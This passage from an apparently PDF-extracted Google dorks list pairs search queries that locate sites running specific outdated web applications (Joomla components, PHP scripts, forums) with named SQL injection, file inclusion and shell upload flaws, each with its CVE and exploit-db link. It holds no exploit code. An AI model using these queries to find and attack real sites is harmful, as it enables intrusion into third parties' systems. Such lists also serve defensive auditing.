Censura 1.15.04 (censura.phpvendorid) SQL Injection Vulnerability- CVE: 2007-2673: http://www.exploit-db.com/exploits/3843

inurl:com_clanlist inurl:com_clanlist

Joomla Component (com_clanlist)SQL Injection Vulnerability:http://www.exploit-db.com/exploits/15456

"This scriptcreated bywww.script.canavari.com"

"This script created bywww.script.canavari.com"

Basic Forum 1.1 (edit.asp) RemoteSQL Injection Vulnerability - CVE:2006-6193: http://www.exploit-db.com/exploits/2848

inurl:classified/product_desc.php?id=

inurl:classified/product_desc.php?id=

GreenCart PHP Shopping Cart (id)Remote SQL Injection Vulnerability -CVE: 2008-3585: http://www.exploit-db.com/exploits/6189

allinurl:"members.asp?action" allinurl:"members.asp?action"

MiniNuke 2.1 (members.asp uid)Remote SQL Injection Vulnerability:http://www.exploit-db.com/exploits/5187

inurl:btg_oglas inurl:btg_oglas

Joomla Component (btg_oglas) HTML& XSS Injection Vulnerability:http://www.exploit-db.com/exploits/15468

"Powered byScripteen FreeImage HostingScript V 2.3"

"Powered by Scripteen Free ImageHosting Script V 2.3"

Scripteen Free Image Hosting Script2.3 Insecure Cookie Handling Vuln -CVE: 2009-4987: http://www.exploit-db.com/exploits/9256

inurl:"com_jvideodirect " inurl:"com_jvideodirect "

Joomla Component com_jvideodirectDirectory Traversal - CVE: 2010-0942:http://www.exploit-db.com/exploits/11089

"Siteman Version1.1.9" "Siteman Version 1.1.9"

Siteman 1.1.9 (cat) Remote FileDisclosure Vulnerability - CVE: 2008-0452: http://www.exploit-

Page 270: Packetstorm Google Dorks List

db.com/exploits/4973

"SimpleBlog 2.3by 8pixel.net" "SimpleBlog 2.3 by 8pixel.net"

SimpleBlog 2.3 (admin/edit.asp)Remote SQL Injection Vulnerability -CVE: 2006-6191: http://www.exploit-db.com/exploits/2853

inurl:/squirrelcart/ inurl:/squirrelcart/

Squirrelcart 2.2.0 (cart_content.php)Remote Inclusion Vulnerability - CVE:2006-2483: http://www.exploit-db.com/exploits/1790

inurl:com_markt inurl:com_markt

Joomla Component (com_markt) SQLInjection Vulnerability:http://www.exploit-db.com/exploits/15469

"powered byEQdkp" "powered by EQdkp"

EQdkp 1.3.0 (dbal.php) Remote FileInclusion Vulnerability - CVE: 2006-2256: http://www.exploit-db.com/exploits/1764

intitle:"Login toCalendar" intitle:"Login to Calendar"

ACal 2.2.6 (day.php) Remote FileInclusion Vulnerability - CVE: 2006-2261: http://www.exploit-db.com/exploits/1763

"WebCalendarv1.0.4" "WebCalendar v1.0.4"

WebCalendar 1.0.4 (includedir)Remote File Inclusion Vulnerability -CVE: 2008-2836: http://www.exploit-db.com/exploits/5847

inurl:"com_bfsurvey" inurl:"com_bfsurvey"

Joomla Component com_bfsurvey LFIVulnerability - CVE: 2010-2259:http://www.exploit-db.com/exploits/10946

anyInventory, themost flexible andpowerful web-based inventorysystem

anyInventory, the most flexible andpowerful web-based inventorysystem

AnyInventory 2.0 (environment.php)Remote File Inclusion Vuln - CVE:2007-4744: http://www.exploit-db.com/exploits/4365

inurl:bemarket inurl:bemarket

BBS E-Market (postscript.phpp_mode) Remote File InclusionVulnerability - CVE: 2007-3934:http://www.exploit-db.com/exploits/4195

inurl:"com_jashowcase " inurl:"com_jashowcase "

Joomla Component com_jashowcaseDirectory Traversal - CVE: 2010-0943:http://www.exploit-db.com/exploits/11090

Page 271: Packetstorm Google Dorks List

Powered by React- www.react.nl Powered by React - www.react.nl

React software [local file inclusion]:http://www.exploit-db.com/exploits/11943

"qjForum" "qjForum"

qjForum (member.asp) SQL InjectionVulnerability - CVE: 2006-2638:http://www.exploit-db.com/exploits/1833

"Powered bycifshanghai.com" "Powered by cifshanghai.com"

Cifshanghai (chanpin_info.php) CMSSQL Injection: http://www.exploit-db.com/exploits/10105

allinurl:"detResolucion.php?tipodoc_id="

allinurl:"detResolucion.php?tipodoc_id="

CMS Ariadna 2009 SQL Injection -OSVDB-ID: 63929:http://www.exploit-db.com/exploits/12301

"Powered By :Yamamah Version1.00"

"Powered By : Yamamah Version1.00"

Yamamah Photo Gallery 1.00 SQLInjection Vulnerability:http://www.exploit-db.com/exploits/13857

Powered by osCSS Powered by osCSSosCSS v1.2.1 Database BackupsDisclosure: http://www.exploit-db.com/exploits/11612

inurl:"index.php?option=com_prime"

inurl:"index.php?option=com_prime"

Joomla Component com_primeDirectory Traversal:http://www.exploit-db.com/exploits/11177

"2006 bywww.mani-stats-reader.de.vu"

"2006 by www.mani-stats-reader.de.vu"

Mani Stats Reader 1.2 (ipath) RemoteFile Include Vulnerability - CVE:2007-1299: http://www.exploit-db.com/exploits/3398

"powered by:WebLeague" "powered by: WebLeague"

webLeague 2.2.0 (install.php) RemoteChange Password: http://www.exploit-db.com/exploits/9164

"All RightsReserved.Powered byDieselScripts.com"

"All Rights Reserved. Powered byDieselScripts.com"

Diesel Joke Site (picture_category.phpid) SQL Injection Vulnerability - CVE:2008-4150: http://www.exploit-db.com/exploits/6488

intitle:WebCalendar system v3.40 inurl:.asp

intitle:Web Calendar system v 3.40inurl:.asp

Web Calendar System 3.40 (XSS/SQL)Multiple Remote Vulnerabilities:http://www.exploit-db.com/exploits/7265

inurl:index.php?op inurl:index.php?option=com_notici Joomla compnent com_noticia cross

Page 272: Packetstorm Google Dorks List

tion=com_noticia a site scripting: http://www.exploit-db.com/exploits/10789

inurl:guestbook.php "AdvancedGuestBook""powered byphpbb"

inurl:guestbook.php "AdvancedGuestBook" "powered by phpbb"

Advanced GuestBook 2.4.0 (phpBB)File Inclusion Vulnerability - CVE:2006-2152: http://www.exploit-db.com/exploits/1723

inurl:index.php?option=com_portfolio

inurl:index.php?option=com_portfolio

Joomla Component com_portfolioLocal File Disclosure:http://www.exploit-db.com/exploits/12325

allinurl:"/ubbthreads/" allinurl:"/ubbthreads/"

UBB Threads 6.4.x-6.5.2 (thispath)Remote File Inclusion Vulnerability -CVE: 2006-2568: http://www.exploit-db.com/exploits/1814

"powered byzomplog" "powered by zomplog"

Zomplog 3.8.2 (force_download.php)File Disclosure Vulnerability:http://www.exploit-db.com/exploits/5636

inurl:"/cgi-bin/ourspace/" inurl:"/cgi-bin/ourspace/"

Ourspace 2.0.9 (uploadmedia.cgi)Remote File Upload Vulnerability -CVE: 2007-4647: http://www.exploit-db.com/exploits/4343

inurl:index.php?option=com_joomradio

inurl:index.php?option=com_joomradio

Joomla Component com_joomradioSQL injection vulnerability - CVE:2008-2633: http://www.exploit-db.com/exploits/12400

"Powered byxeCMS" "Powered by xeCMS"

xeCMS 1.x (view.php list) Remote FileDisclosure Vulnerability - CVE: 2007-6508: http://www.exploit-db.com/exploits/4758

Power by PHPClassifieds Power by PHP Classifieds

Pre PHP Classifieds SQL InjectionVulnerability: http://www.exploit-db.com/exploits/13992

"powered byclipshare" "powered by clipshare"

ClipShare 3.0.1 (tid) Remote SQLInjection Vulnerability - CVE: 2008-2793: http://www.exploit-db.com/exploits/5839

inurl:"com_dailymeals" inurl:"com_dailymeals"

Joomla Component com_dailymealsLFI Vulnerability: http://www.exploit-db.com/exploits/10928

inurl:"/k12.tr/?part inurl:"/k12.tr/?part=" Okul Otomasyon Portal 2.0 Remote

Page 273: Packetstorm Google Dorks List

=" SQL Injection Vulnerability - CVE:2007-5490: http://www.exploit-db.com/exploits/4539

inurl:"toplist.php""powered byphpbb"

inurl:"toplist.php" "powered byphpbb" TopList

inurl:"com_clan" inurl:"com_clan"

Joomla Component (com_clan) SQLInjection Vulnerability:http://www.exploit-db.com/exploits/15454

"Powered by WSNGuest" "Powered by WSN Guest"

WSN Guest Database DisclosureVulnerability: http://www.exploit-db.com/exploits/11344

allinurl:com_paxxgallery"userid"

allinurl: com_paxxgallery "userid"

Joomla Component paxxgallery 0.2(iid) SQL Injection Vulnerability -CVE: 2008-0801: http://www.exploit-db.com/exploits/5117

inurl:"index2.php?option=rss" OR"powered ByLimbo CMS"

inurl:"index2.php?option=rss" OR"powered By Limbo CMS"

Limbo CMS 1.0.4.2 (sql.php) RemoteFile Inclusion Vulnerability - CVE:2006-2142: http://www.exploit-db.com/exploits/1729

"Powered byezContentsVersion 1.4.5"

"Powered by ezContents Version1.4.5"

ezContents 1.4.5 (index.php link)Remote File Disclosure Vulnerability -CVE: 2007-6368: http://www.exploit-db.com/exploits/4694

allinurl:com_quiz"tid" allinurl: com_quiz"tid"

Joomla Component Quiz 0.81 (tid)SQL Injection Vulnerability - CVE:2008-0799: http://www.exploit-db.com/exploits/5119

inurl:"com_biographies" inurl:"com_biographies"

Joomla Component com_biographiesSQL injection Vulnerability:http://www.exploit-db.com/exploits/11226

inurl"com_gurujibook" inurl"com_gurujibook"

Joomla Component com_gurujibookSQL injection Vulnerability:http://www.exploit-db.com/exploits/11225

inurl:/system/article/alltopics.php ORinurl:/system/user/index.php

inurl:/system/article/alltopics.phpOR inurl:/system/user/index.php

OpenPHPNuke 2.3.3 Remote FileInclusion Vulnerability - CVE: 2006-2137: http://www.exploit-db.com/exploits/1727

Realizzato con Realizzato con WSC CMS by WSC CMS (Bypass) SQL Injection

Page 274: Packetstorm Google Dorks List

WSC CMS byDynamicsoft

Dynamicsoft Vulnerability - CVE: 2010-0698:http://www.exploit-db.com/exploits/11507

"Powered byKnowledge Base" "Powered by Knowledge Base"

Knowledge Base Mod 2.0.2 (phpBB)Remote Inclusion Vulnerability - CVE:2006-2134: http://www.exploit-db.com/exploits/1728

allinurl:"com_extcalendar" allinurl:"com_extcalendar"

Joomla Component com_extcalendarBlind SQL Injection Vulnerability:http://www.exploit-db.com/exploits/14694

intitle:"JaxFormmailer -Administration"

intitle:"Jax Formmailer -Administration"

Jax FormMailer 3.0.0 Remote FileInclusion Vulnerability - CVE: 2009-2378: http://www.exploit-db.com/exploits/9051

inurl:index.php?option=com_yanc inurl:index.php?option=com_yanc

Mambo com_yanc 1.4 beta (id)Remote SQL Injection Vulnerability -CVE: 2007-2792: http://www.exploit-db.com/exploits/3944

allinurl:"index.php?p=gallerypic img_id"

allinurl: "index.php?p=gallerypicimg_id"

Koobi Pro v6.1 gallery (img_id) -CVE: 2008-6210: http://www.exploit-db.com/exploits/10751

inurl:classified.phpphpbazar inurl:classified.php phpbazar

phpBazar 2.1.0 Remote (Include/AuthBypass) Vulnerabilities - CVE: 2006-2527: http://www.exploit-db.com/exploits/1804

intext:"Poweredby FirebrandTechnologies"

intext:"Powered by FirebrandTechnologies"

CMS Firebrand Tec Local FileInclusion Vulnerability:http://www.exploit-db.com/exploits/12378

"Designed andDeveloped byDebliteck Ltd"

"Designed and Developed byDebliteck Ltd"

DB[CMS] Sql Injection Vulnerability:http://www.exploit-db.com/exploits/12654

"Designed andDeveloped byDebliteck Ltd"

"Designed and Developed byDebliteck Ltd"

DB[CMS] (section.php) SQL InjectionVulnerability: http://www.exploit-db.com/exploits/12659

Supernews 2.6 Supernews 2.6

Supernews 2.6 (index.php noticia)Remote SQL Injection Vulnerability:http://www.exploit-db.com/exploits/8869

"powered byezUserManager" "powered by ezUserManager" ezUserManager 1.6 Remote File

Inclusion Vulnerability - CVE: 2006-

Page 275: Packetstorm Google Dorks List

2424: http://www.exploit-db.com/exploits/1795

Powered by:PreProjects Powered by: PreProjects

Pre Multi-Vendor Shopping Malls(products.php?sid) SQL InjectionVulnerability: http://www.exploit-db.com/exploits/13996

allintitle:"MCgallery 0.5b" allintitle: "MCgallery 0.5b"

McGallery 0.5b (download.php)Arbitrary File Download Vulnerability- CVE: 2007-1478: http://www.exploit-db.com/exploits/3494

contact_frm.php contact_frm.php

Recipes Website 1.0 SQL Injection -OSVDB-ID: 64841:http://www.exploit-db.com/exploits/12703

Powered byNatterchat v1.12 Powered by Natterchat v1.12

Natterchat 1.12 (Auth Bypass) RemoteSQL Injection Vulnerability - CVE:2008-7049: http://www.exploit-db.com/exploits/7175

"Instant Free FileUploader" "Instant Free File Uploader"

Uploaderr 1.0 - File Hosting ScriptShell Upload Vulnerability:http://www.exploit-db.com/exploits/10241

Powered by Webizinurl:'wmt/webpages'

Powered by Webizinurl:'wmt/webpages

(Webiz) SQL Injection Vulnerability:http://www.exploit-db.com/exploits/12798

"Powered byxchangeboard" "Powered by xchangeboard"

XchangeBoard 1.70 (boardID) RemoteSQL Injection Vulnerability - CVE:2008-3035: http://www.exploit-db.com/exploits/5991

allinurl:com_mcquiz "tid" allinurl: com_mcquiz "tid"

Joomla Component MCQuiz 0.9 Final(tid) SQL Injection Vulnerability -CVE: 2008-0800: http://www.exploit-db.com/exploits/5118

inurl:"com_productbook" inurl:"com_productbook"

Joomla Component com_productbookSQL Injection Vulnerability - CVE:2010-1045: http://www.exploit-db.com/exploits/11352

inurl:"com_alphacontent"

inurl: "com_alphacontent"

Joomla Component alphacontent 2.5.8(id) SQL Injection Vulnerability -CVE: 2008-1559: http://www.exploit-db.com/exploits/5310

"Powered by: "Powered by: PreProjects" Pre Multi-Vendor Shopping Malls SQL

Page 276: Packetstorm Google Dorks List

PreProjects" Injection Vulnerability:http://www.exploit-db.com/exploits/13987

"Powered bySoftbizScripts"inurl:store_info.php

"Powered by SoftbizScripts"inurl:store_info.php

Softbiz Classifieds PLUS (id) RemoteSQL Injection Vulnerability - CVE:2007-5122: http://www.exploit-db.com/exploits/4457

inurl:"com_avosbillets" inurl:"com_avosbillets"

Joomla (com_avosbillets) SQLinjection Vulnerability:http://www.exploit-db.com/exploits/11223

"Powered ByAardvark TopsitesPHP 4.2.2"

"Powered By Aardvark TopsitesPHP 4.2.2"

Aardvark Topsites PHP 4.2.2 (path)Remote File Inclusion Vuln - CVE:2006-7026: http://www.exploit-db.com/exploits/1730

inurl:"com_projectfork" inurl:"com_projectfork"

Joomla Component com_Projectfork2.0.10 Local File Inclusion Vuln -CVE: 2009-2100: http://www.exploit-db.com/exploits/8946

intext:"PoweredbyPHPCityPortal.com"

intext:"Powered byPHPCityPortal.com"

PHPCityPortal (Auth Bypass) RemoteSQL Injection Vulnerability - CVE:2009-4870: http://www.exploit-db.com/exploits/9395

intitle:"jGallery" intitle:"jGallery"

jGallery 1.3 (index.php) Remote FileInclusion Vulnerability - CVE: 2007-2158: http://www.exploit-db.com/exploits/3760

"Powered byDownload 3000" "Powered by Download 3000"

Joomla Component d3000 1.0.0Remote SQL Injection Vulnerability:http://www.exploit-db.com/exploits/5299

intitle:"zFeederadmin panel" intitle:"zFeeder admin panel"

zFeeder 1.6 (admin.php) NoAuthentication Vulnerability - CVE:2009-0807: http://www.exploit-db.com/exploits/8092

Powered byWebStudio Powered by WebStudio

WebStudio CMS (pageid) RemoteBlind SQL Injection Vuln - CVE:2008-5336: http://www.exploit-db.com/exploits/7236

inurl:"select_file2.php" inurl:"select_file2.php"

Flashden Multiple File Uploader ShellUpload Vulnerability:http://www.exploit-db.com/exploits/10236

Page 277: Packetstorm Google Dorks List

"powered byGradman" "powered by Gradman"

Gradman 0.1.3 (info.php tabla) LocalFile Inclusion Vulnerability - CVE:2008-0393: http://www.exploit-db.com/exploits/4936

"Designed andDeveloped byDebliteck Ltd"

"Designed and Developed byDebliteck Ltd"

DB[CMS] (article.php) SQL InjectionVulnerability: http://www.exploit-db.com/exploits/12666

"Powered bymlffat" "Powered by mlffat"

Mlffat 2.1 (Auth Bypass / Cookie) SQLInjection Vulnerability:http://www.exploit-db.com/exploits/8674

inurl:"/squirrelcart/" -squirrelcart.com

inurl:"/squirrelcart/" -squirrelcart.com

Squirrelcart 1.x.x (cart.php) RemoteFile Inclusion Vulnerability - CVE:2007-4439: http://www.exploit-db.com/exploits/4295

Engine poweredby easyLinkV1.1.0.

Engine powered by easyLinkV1.1.0.

easyLink 1.1.0 (detail.php) RemoteSQL Injection Vulnerability - CVE:2008-6471: http://www.exploit-db.com/exploits/6494

allintext: "This siteis powered byIndexScript"

allintext: "This site is powered byIndexScript"

IndexScript 2.8 (show_cat.php cat_id)SQL Injection Vulnerability - CVE:2007-4069: http://www.exploit-db.com/exploits/4225

"powered byPassWiki" "powered by PassWiki"

PassWiki 0.9.16 RC3 (site_id) LocalFile Inclusion Vulnerability - CVE:2008-6423: http://www.exploit-db.com/exploits/5704

"software 2004-2005 by randshop" "software 2004-2005 by randshop"

Randshop 1.1.1 (header.inc.php)Remote File Include Vulnerability -CVE: 2006-3375: http://www.exploit-db.com/exploits/1971

"powered byphpEmployment" "powered by phpEmployment"

phpEmployment (php upload)Arbitrary File Upload Vulnerability -CVE: 2008-6920: http://www.exploit-db.com/exploits/7563

inurl:"wp-download.php?dl_id="

inurl:"wp-download.php?dl_id="

Wordpress Plugin Download (dl_id)SQL Injection Vulnerability - CVE:2008-1646: http://www.exploit-db.com/exploits/5326

"Powered by VSPANEL" "Powered by VS PANEL"

VS PANEL 7.3.6 (Cat_ID) RemoteSQL Injection Vulnerability - CVE:2009-3590: http://www.exploit-db.com/exploits/8506

Page 278: Packetstorm Google Dorks List

"powered byphpmydirectory"OR intext:"2001-2006phpMyDirectory.com"

"powered by phpmydirectory" ORintext:"2001-2006phpMyDirectory.com"

phpMyDirectory 10.4.4(ROOT_PATH) Remote InclusionVulnerability - CVE: 2006-2521:http://www.exploit-db.com/exploits/1808

intext:"Kalimatnews system v1.0"

intext:"Kalimat news system v 1.0"kalimat new system v 1.0 (index.php)SQL Injection: http://www.exploit-db.com/exploits/11563

Powered by:PhotoPost PHP 4.6 Powered by: PhotoPost PHP 4.6

PhotoPost PHP SQL InjectionVulnerability: http://www.exploit-db.com/exploits/14446

"Powered byMaian Recipev1.0"

"Powered by Maian Recipe v1.0"

Maian Recipe 1.0 (path_to_folder)Remote File Include Vulnerability -CVE: 2007-0848: http://www.exploit-db.com/exploits/3284

"Powered byCommonSenseCMS"

"Powered by CommonSense CMS"CommonSense CMS Sql InjectionVulnerability: http://www.exploit-db.com/exploits/13762

"Eyeland StudioInc. All RightsReserved."inurl:game.php

"Eyeland Studio Inc. All RightsReserved." inurl:game.php

Eyeland Studio Inc. (game.php) SQLInjection Vulnerability:http://www.exploit-db.com/exploits/13858

"powered byPagetool" "powered by Pagetool"

Pagetool 1.07 (news_id) Remote SQLInjection Vulnerability - CVE: 2007-3402: http://www.exploit-db.com/exploits/4107

powered by jshop powered by jshop

Jshop Server 1.3 (fieldValidation.php)Remote File Include Vulnerability -CVE: 2007-0232: http://www.exploit-db.com/exploits/3113

/modules/mx_links/ /modules/mx_links/

mxBB Module WebLinks 2.05 RemoteInclusion Vulnerability - CVE: 2006-6645: http://www.exploit-db.com/exploits/2939

inurl:"?pageNum_RSnews"&view inurl:"?pageNum_RSnews"&view

NUs Newssystem v1.02 (id) SQLInjection Vulnerability:http://www.exploit-db.com/exploits/11674

inurl:index.php?option=com_directory

inurl:index.php?option=com_directory

Joomla Component mosDirectory 2.3.2(catid) SQL Injection Vulnerability -CVE: 2008-0690: http://www.exploit-db.com/exploits/5047

Page 279: Packetstorm Google Dorks List

"Powered ByDynamicPAD" "Powered By DynamicPAD"

DynamicPAD 1.02.18 (HomeDir)Remote File Inclusion Vulnerabilities -CVE: 2007-2527: http://www.exploit-db.com/exploits/3868

"Powered by :elkagroup.com" "Powered by : elkagroup.com"

elkagroup (pid ) Remote SQL InjectionVulnerability: http://www.exploit-db.com/exploits/10836

"com_joom12pic" "com_joom12pic"

Joomla Component joom12Pic 1.0Remote File Inclusion Vulnerability -CVE: 2007-4954: http://www.exploit-db.com/exploits/4416

"Starting bid""Powered bySoftbizScripts"

"Starting bid" "Powered bySoftbizScripts"

Softbiz Auctions Scriptproduct_desc.php Remote SQLInjection Vuln - CVE: 2007-5999:http://www.exploit-db.com/exploits/4617

"Liberum HelpDesk, Copyright(C) 2001 DougLuxem. Pleaseview the license

"Liberum Help Desk, Copyright (C)2001 Doug Luxem. Please view thelicense

Liberum Help Desk 0.97.3 (details.asp)SQL Injection Vulnerability - CVE:2006-6160: http://www.exploit-db.com/exploits/2846

allinurl:"jokes.php?catagorie=" allinurl:"jokes.php?catagorie="

Jokes Site Script (jokes.php?catagorie)SQL Injection Vulnerability - CVE:2008-2065: http://www.exploit-db.com/exploits/5508

"Created byweenCompany" "Created by weenCompany"

weenCompany SQL InjectionVulnerability - CVE: 2009-4423:http://www.exploit-db.com/exploits/10606

intext:"Poweredby eStore v1.0.2" intext:"Powered by eStore v1.0.2"

eStore v1.0.2 SQL InjectionVulnerability: http://www.exploit-db.com/exploits/10784

"Powered by: EliteGaming Laddersv3.2"

"Powered by: Elite Gaming Laddersv3.2"

Elite Gaming Ladders 3.2 (platform)SQL Injection Vulnerability - CVE:2009-3314: http://www.exploit-db.com/exploits/9702

php-addressbookv3.1.5 php-addressbook v3.1.5

php-addressbook v3.1.5(edit.php) SQLInjection Vulnerability:http://www.exploit-db.com/exploits/10877

"Powered byParsBlogger" "Powered by ParsBlogger"

ParsBlogger (blog.asp wr) RemoteSQL Injection Vulnerability - CVE:2008-5637: http://www.exploit-

Page 280: Packetstorm Google Dorks List

db.com/exploits/7239

intitle:"vrnews v1" intitle:"vrnews v1"

VRNews 1.1.1 (admin.php) RemotePermission Bypass Vulnerability -CVE: 2007-3611: http://www.exploit-db.com/exploits/4150

inurl:"customer_testimonials.php" inurl:"customer_testimonials.php"

osCommerce Addon CustomerTestimonials 3.1 SQL InjectionVulnerability - CVE: 2008-0719:http://www.exploit-db.com/exploits/5075

"Powered byEspinas IT" "Powered by Espinas IT"

Espinas CMS SQL InjectionVulnerability: http://www.exploit-db.com/exploits/12100

"Powered byiNetScripts" "Powered by iNetScripts"

Powered by iNetScripts: Shell UploadVulnerability: http://www.exploit-db.com/exploits/12384

Maintained withthe Ocean12 PollManager Pro v1.00

Maintained with the Ocean12 PollManager Pro v1.00

Ocean12 Poll Manager Pro DatabaseDisclosure Vulnerability:http://www.exploit-db.com/exploits/7246

allinurl:"com_glossary" allinurl: "com_glossary"

Mambo Component Glossary 2.0(catid) SQL Injection Vulnerability -CVE: 2008-0514: http://www.exploit-db.com/exploits/5010

inurl:buyer/about_us.php?BuyerID inurl:buyer/about_us.php?BuyerID

Alibaba Clone Platinum(about_us.php) SQL InjectionVulnerability: http://www.exploit-db.com/exploits/12612

Maintained withthe Ocean12Calendar ManagerGold v2.04

Maintained with the Ocean12Calendar Manager Gold v2.04

Ocean12 Calendar Manager GoldDatabase Disclosure Vulnerability:http://www.exploit-db.com/exploits/7247

pagerank-0-topliste.html ORpagerank-0-tipp.html

pagerank-0-topliste.html ORpagerank-0-tipp.html

phpscripts Ranking Script InsecureCookie Handling Vulnerability - CVE:2008-6092: http://www.exploit-db.com/exploits/6649

Powered byUCenterinurl:shop.php?ac=view

Powered by UCenterinurl:shop.php?ac=view

UCenter Home 2.0 SQL InjectionVulnerability: http://www.exploit-db.com/exploits/14997

intext:"PoweredBy : Yamamah

intext:"Powered By : YamamahVersion 1.00"

Yamamah 1.0 SQL InjectionVulnerability: http://www.exploit-

Page 281: Packetstorm Google Dorks List

Version 1.00" db.com/exploits/13849

"Sinapis byscripter.ch" "Sinapis by scripter.ch"

Sinapis Forum 2.2 (sinapis.php fuss)Remote File Include Vulnerability -CVE: 2007-1131: http://www.exploit-db.com/exploits/3367

"Powered byBosClassifiedsClassified AdsSystem"

"Powered by BosClassifiedsClassified Ads System"

BosClassifieds 3.0 (index.php cat) SQLInjection Vulnerability - CVE: 2008-1838: http://www.exploit-db.com/exploits/5444

"Powered byRGameScript" "Powered by RGameScript"

RGameScript Pro (page.php id)Remote File Inclusion Vulnerability -CVE: 2007-3980: http://www.exploit-db.com/exploits/4210

inurl:"/files/redirect.asp" inurl:"/files/redirect.asp"

JBS v2.0 | JBSX - Administrationpanel bypass and Malicious FileUpload Vulnerability:http://www.exploit-db.com/exploits/10161

"Easy-Clanpagev2.2" "Easy-Clanpage v2.2"

Easy-Clanpage 2.2 (id) Remote SQLInjection Vulnerability - CVE: 2008-1425: http://www.exploit-db.com/exploits/5275

inurl:"/plugins/ImageManager/manager.php"

inurl:"/plugins/ImageManager/manager.php"

Wordpress Image Manager PluginsShell Upload Vulnerability:http://www.exploit-db.com/exploits/10325

"com_joomlaflashfun" "com_joomlaflashfun"

Joomla Component Flash Fun! 1.0Remote File Inclusion Vulnerability -CVE: 2007-4955: http://www.exploit-db.com/exploits/4415

Powered byBKWorks ProPHPVersion 0.50 Beta1

Powered by BKWorks ProPHPVersion 0.50 Beta 1

BKWorks ProPHP 0.50b1 (AuthBypass) SQL Injection Vulnerability:http://www.exploit-db.com/exploits/7726

inurl:"whoiscart/admin/hostinginterfaces/"

inurl:"whoiscart/admin/hostinginterfaces/"

WHOISCART Scripting Vulnerability:http://www.exploit-db.com/exploits/10812

Powered by SisfoKampus 2006 Powered by Sisfo Kampus 2006

Sisfo Kampus 2006(blanko.preview.php) Local FileDisclosure Vuln - CVE: 2007-4820:http://www.exploit-db.com/exploits/4380

Page 282: Packetstorm Google Dorks List

inurl:"sticker/sticker.php?id=" inurl:"sticker/sticker.php?id="

2Capsule (sticker.php id) Remote SQLInjection Vulnerability:http://www.exploit-db.com/exploits/7631

inurl:quizinfo.php inurl:quizinfo.phpPHP-MySQL-Quiz SQL InjectionVulnerability: http://www.exploit-db.com/exploits/10876

"Powered by Md-Pro" "Powered by Md-Pro"

Md-Pro 1.0.8x (Topics topicid) RemoteSQL Injection Vulnerability - CVE:2007-3938: http://www.exploit-db.com/exploits/4199

inurl:"index.php?option=com_simpleboard"

inurl:"index.php?option=com_simpleboard"

Mambo Component Simpleboard 1.0.3(catid) SQL Injection Vulnerability -CVE: 2008-1077: http://www.exploit-db.com/exploits/5195

inurl:"tradeCategory.php?id= " inurl:"tradeCategory.php?id= "

Hampshire Trading Standards ScriptSQL Injection Vulnerability:http://www.exploit-db.com/exploits/12768

inurl:"com_omphotogallery" inurl:"com_omphotogallery"

Joomla Omilen Photo Gallery 0.5bLocal File Inclusion Vulnerability -CVE: 2009-4202: http://www.exploit-db.com/exploits/8870

inurl:"sinagb.php" inurl:"sinagb.php"

Sinapis 2.2 Gastebuch (sinagb.phpfuss) Remote File IncludeVulnerability - CVE: 2007-1130:http://www.exploit-db.com/exploits/3366

inurl:csc_article_details.php inurl:csc_article_details.php

CaupoShop Classic 1.3 (saArticle[ID])Remote SQL Injection Vulnerability -CVE: 2008-2866: http://www.exploit-db.com/exploits/5865

inurl:index.php?page=img PoweredBy Mini File Host

inurl:index.php?page=img PoweredBy Mini File Host

Mini File Host 1.x Arbitrary PHP FileUpload Vulnerability - CVE: 2008-6785: http://www.exploit-db.com/exploits/7509

allinurl:com_pccookbook allinurl:com_pccookbook

pc_cookbook Mambo Component 0.3Include Vulnerability - CVE: 2006-3530: http://www.exploit-db.com/exploits/2024

"Powered byLDU" "Powered by LDU"

LDU 8.x (polls.php) Remote SQLInjection Vulnerability:http://www.exploit-

Page 283: Packetstorm Google Dorks List

db.com/exploits/2871

intext:"powered bytincan ltd" intext:"powered by tincan ltd"

tincan ltd (section) SQL InjectionVulnerability: http://www.exploit-db.com/exploits/11113

"REALTOR 747 -Version 4.11" "REALTOR 747 - Version 4.11"

Realtor 747 (define.php INC_DIR)Remote File Inclusion Vulnerability -CVE: 2009-0495: http://www.exploit-db.com/exploits/7743

inurl:"view_group.php?group_id=" inurl:"view_group.php?group_id="

Vastal I-Tech SQL InjectionVulnerability: http://www.exploit-db.com/exploits/12845

"CzarNews v1.12" | "CzarNewsv1.13" |"CzarNews v1.14"

"CzarNews v1.12 " | "CzarNewsv1.13" | "CzarNews v1.14 "

CzarNews 1.14 (tpath) Remote FileInclusion Vulnerability - CVE: 2006-3685: http://www.exploit-db.com/exploits/2009

inurl:"filebase.php" "Powered byphpBB"

inurl:"filebase.php" "Powered byphpBB"

phpBB Mod FileBase (id) Remote SQLInjection Vulnerability - CVE: 2008-1305: http://www.exploit-db.com/exploits/5236

allinurl: "nameSections opviewarticle artid"

allinurl: "name Sections opviewarticle artid"

PHP-Nuke Module Sections (artid)Remote SQL Injection Vulnerability:http://www.exploit-db.com/exploits/5154

"Powered bysamart-cms" "Powered by samart-cms"

samart-cms 2.0 (contentsid) RemoteSQL Injection Vulnerability:http://www.exploit-db.com/exploits/5862

Ultimate-Fun-Book 1.02 Ultimate-Fun-Book 1.02

Ultimate Fun Book 1.02 (function.php)Remote File Include Vulnerability -CVE: 2007-1059: http://www.exploit-db.com/exploits/3336

allinurl:"modules/dictionary/detail.php?id"

allinurl:"modules/dictionary/detail.php?id"

XOOPS Module dictionary 2.0.18(detail.php) SQL InjectionVulnerability - CVE: 2009-4582:http://www.exploit-db.com/exploits/10807

"Copyright (C)2000 PhorumDevelopmentTeam"

"Copyright (C) 2000 PhorumDevelopment Team"

Phorum 3.2.11 (common.php) RemoteFile Include Vulnerability - CVE:2006-6550: http://www.exploit-db.com/exploits/2894

inurl:flashblog.htm inurl:flashblog.html OR FlashBlog 0.31b Remote Arbitrary File

Page 284: Packetstorm Google Dorks List

l ORinurl:/flashblog/

inurl:/flashblog/ Upload Vulnerability - CVE: 2008-2574: http://www.exploit-db.com/exploits/5728

"Powered ByCMS-BRD" "Powered By CMS-BRD"

CMS-BRD (menuclick) Remote SQLInjection Vulnerability - CVE: 2008-2837: http://www.exploit-db.com/exploits/5863

"inurl:/admin/""ImageVue" "inurl:/admin/" "ImageVue"

ImageVue 2.0 Remote Admin Login:http://www.exploit-db.com/exploits/10630

"TROforum 0.1" "TROforum 0.1"

TROforum 0.1 (admin.php site_url)Remote File Inclusion Vulnerability -CVE: 2007-2937: http://www.exploit-db.com/exploits/3995

"Uploader byCeleronDude." "Uploader by CeleronDude."

Uploader by CeleronDude 5.3.0 ShellUpload: http://www.exploit-db.com/exploits/10523

"Review Script""Phil Taylor" "Review Script" "Phil Taylor"

Mambo Component Comments0.5.8.5g SQL Injection Vulnerability -CVE: 2008-0773: http://www.exploit-db.com/exploits/5094

